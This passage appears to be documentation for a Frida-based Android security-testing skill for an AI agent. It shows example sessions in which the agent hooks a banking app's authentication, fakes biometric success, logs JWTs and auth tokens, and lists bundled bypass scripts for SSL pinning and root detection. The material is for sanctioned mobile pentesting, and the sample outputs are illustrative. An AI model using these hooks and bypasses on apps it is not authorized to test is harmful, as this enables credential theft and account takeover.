| Auth tokens in SharedPreferences | High | MASTG-TEST-0001 |
| Unencrypted SQLite database | High | MASTG-TEST-0001 |
| PII in plaintext files | Medium | MASTG-TEST-0002 |
| Docs on external storage | Medium | MASTG-TEST-0003 |
```

### Example 3: Authentication Bypass
```text
User: Test the authentication for vulnerabilities

Claude: I'll test authentication mechanisms comprehensively.

[Executes MCP tools]

1. Hooking authentication flow:
   > frida_run_script(12345, "credential_hooks.js")
   [HOOK] SharedPreferences write: auth_token = eyJ...
   [HOOK] HTTP Header: Authorization: Bearer eyJ...

2. Biometric testing:
   > frida_run_script(12345, "biometric_bypass.js")
   [HOOK] BiometricPrompt.authenticate() called
   [BYPASS] Simulating successful authentication
   [!] FINDING: Biometric bypass successful
   - App accepts fake biometric success callback
   - No server-side verification
   Severity: HIGH - Authentication bypass
   MASTG: MASTG-TEST-0015

3. Session analysis:
   > frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")
   [HOOK] validateSession(): Only checks local JWT expiry
   [HOOK] refreshSession(): No server round-trip
   [!] FINDING: Client-side session validation
   - JWT expiry can be modified locally
   - Sessions never verified server-side
   Severity: HIGH - Broken session management
   MASTG: MASTG-TEST-0016

4. Token analysis:
   > frida_run_script(12345, """
   Java.perform(function() {
       var JWT = Java.use('com.auth0.jwt.JWT');
       JWT.decode.implementation = function(token) {
           console.log('[JWT] ' + token);
           return this.decode(token);
       };
   });
   """)
   [!] FINDING: JWT uses HS256 (weak algorithm)
   [!] FINDING: JWT contains: account_id, role, permissions

Findings Summary:
| Issue | Severity | Impact |
|-------|----------|--------|
| Biometric bypass | High | Full account access |
| Client-side sessions | High | Persistent unauthorized access |
| Weak JWT algorithm | Medium | Potential token forgery |
```

## Related Resources
- OWASP MASTG - Mobile Application Security Testing Guide
- OWASP MASVS - Mobile Application Security Verification Standard
- Frida Documentation - Dynamic instrumentation toolkit
- Android Security Bulletin - Monthly security updates

## Bundled Resources

### scripts/

- `ssl_pinning_bypass.js` - Universal SSL pinning bypass
- `root_bypass.js` - Root detection bypass
- `crypto_hooks.js` - Crypto operation monitoring
- `keystore_hooks.js` - Android Keystore hooks
- `method_tracer.js` - Generic method tracing
- `extract_apk.py` - APK extraction tool
- `content_provider_scanner.py` - Content provider enumeration
- `intent_fuzzer.py` - Intent fuzzing automation

### references/

- `owasp_mobile_top10.md` - OWASP Mobile Top 10
- `android_security_checklist.md` - Testing checklist
- `frida_snippets.md` - Common Frida code snippets